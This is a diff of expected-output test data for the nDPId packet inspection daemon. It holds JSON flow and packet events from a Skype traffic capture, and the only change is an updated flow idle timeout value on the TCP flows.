00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -34,8 +34,8 @@ 00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1431969642376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431969642376,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1+lUAQEJvL9OBgAABAAEAAAAABWU3NzY4AWIKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAQABBffSSI="} 00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e7768.b.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.223.73.34"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642376,"flow_last_seen":1431969642376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1431969642376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw0tAAEAGVKHAqAEiF99JIsNrAbvkkjeSAAAAALAC\/\/9pYAAAAgQFtAEDAwUBAQgKPiKLYwAAAAAEAgAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642376,"flow_last_seen":1431969642376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1431969642376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw0tAAEAGVKHAqAEiF99JIsNrAbvkkjeSAAAAALAC\/\/9pYAAAAgQFtAEDAwUBAQgKPiKLYwAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1431969642398,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969642398,"pkt":"0NQSxnP1PBXCt3IOCABFAABKxdsAAEARMVTAqAEiwKgBAcNGADUANrH\/diQBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDYBcgVza3lwZQNuZXQAAAEAAQ=="} 00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -44,17 +44,17 @@ 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1431969642400,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1431969642400,"pkt":"PBXCt3IO0NQSxnP1CABFAACYAABAAEARtuHAqAEBwKgBIgA15TkAhAy4SPGBgAABAAAAAQAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAHALQAGAAEAAArBADUDbnMxBG1zZnQDbmV0AAZtc25oc3QJbWljcm9zb2Z0wDJ4Gz7uAAAcIAAAA4QAJOoAAAAOEA=="} 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431969642400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1431969642433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969642433,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGIPEX30kiwKgBIgG7w2sxgMP95JI3k6ASOJD6qQAAAgQFrAQCCAr301nQPiKLYwEDAwU="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1431969642434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642434,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0zNJAAEAGSybAqAEiF99JIsNrAbvkkjeTMYDD\/oAQECxRlwAAAQEICj4ii5z301nQ"} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642376,"flow_last_seen":1431969642434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969642434,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skypeassets.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642444,"flow_last_seen":1431969642444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642444,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1431969642444,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642444,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1ldAAEAGhorAqAEinTh+08NsAbvs\/oHsAAAAALAC\/\/9bSwAAAgQFtAEDAwUBAQgKPiKLpgAAAAAEAgAA"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1431969642469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969642469,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYZlBN98hwKgBIpxCw2oyvdjRgJS+lKASOJDQnQAAAgQFrAQCCApNl5tJPiKLPAEDAwk="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1431969642469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642469,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MzFAAEAGJXDAqAEiQTffIcNqnEKAlL6UMr3Y0oAQECwnRgAAAQEICj4ii75Nl5tJ"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1431969642519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969642519,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4WGRAAHYGzoWdOH7TwKgBIgG7w2wloWLk7P6B7ZASIACkPAAAAgQFrAQCCAoZLBplPiKLpg=="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1431969642519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642519,"pkt":"0NQSxnP1PBXCt3IOCABFAAA00kpAAEAGiqPAqAEinTh+08NsAbvs\/oHtJaFi5YAQ\/\/\/eqAAAAQEICj4ii\/AZLBpl"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642444,"flow_last_seen":1431969642548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969642548,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01400{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642444,"flow_last_seen":1431969642708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431969642708,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1431969642433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969642433,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGIPEX30kiwKgBIgG7w2sxgMP95JI3k6ASOJD6qQAAAgQFrAQCCAr301nQPiKLYwEDAwU="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1431969642434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642434,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0zNJAAEAGSybAqAEiF99JIsNrAbvkkjeTMYDD\/oAQECxRlwAAAQEICj4ii5z301nQ"} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642376,"flow_last_seen":1431969642434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969642434,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skypeassets.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642444,"flow_last_seen":1431969642444,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642444,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1431969642444,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642444,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1ldAAEAGhorAqAEinTh+08NsAbvs\/oHsAAAAALAC\/\/9bSwAAAgQFtAEDAwUBAQgKPiKLpgAAAAAEAgAA"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1431969642469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969642469,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYZlBN98hwKgBIpxCw2oyvdjRgJS+lKASOJDQnQAAAgQFrAQCCApNl5tJPiKLPAEDAwk="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1431969642469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642469,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MzFAAEAGJXDAqAEiQTffIcNqnEKAlL6UMr3Y0oAQECwnRgAAAQEICj4ii75Nl5tJ"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1431969642519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969642519,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4WGRAAHYGzoWdOH7TwKgBIgG7w2wloWLk7P6B7ZASIACkPAAAAgQFrAQCCAoZLBplPiKLpg=="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1431969642519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642519,"pkt":"0NQSxnP1PBXCt3IOCABFAAA00kpAAEAGiqPAqAEinTh+08NsAbvs\/oHtJaFi5YAQ\/\/\/eqAAAAQEICj4ii\/AZLBpl"} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642444,"flow_last_seen":1431969642548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969642548,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01400{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642444,"flow_last_seen":1431969642708,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431969642708,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642969,"flow_last_seen":1431969642969,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969642969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1431969642969,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969642969,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6a7MAAEARi4zAqAEiwKgBAcLvADUAJlJY1+QBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642969,"flow_last_seen":1431969642969,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969642969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -65,11 +65,11 @@ 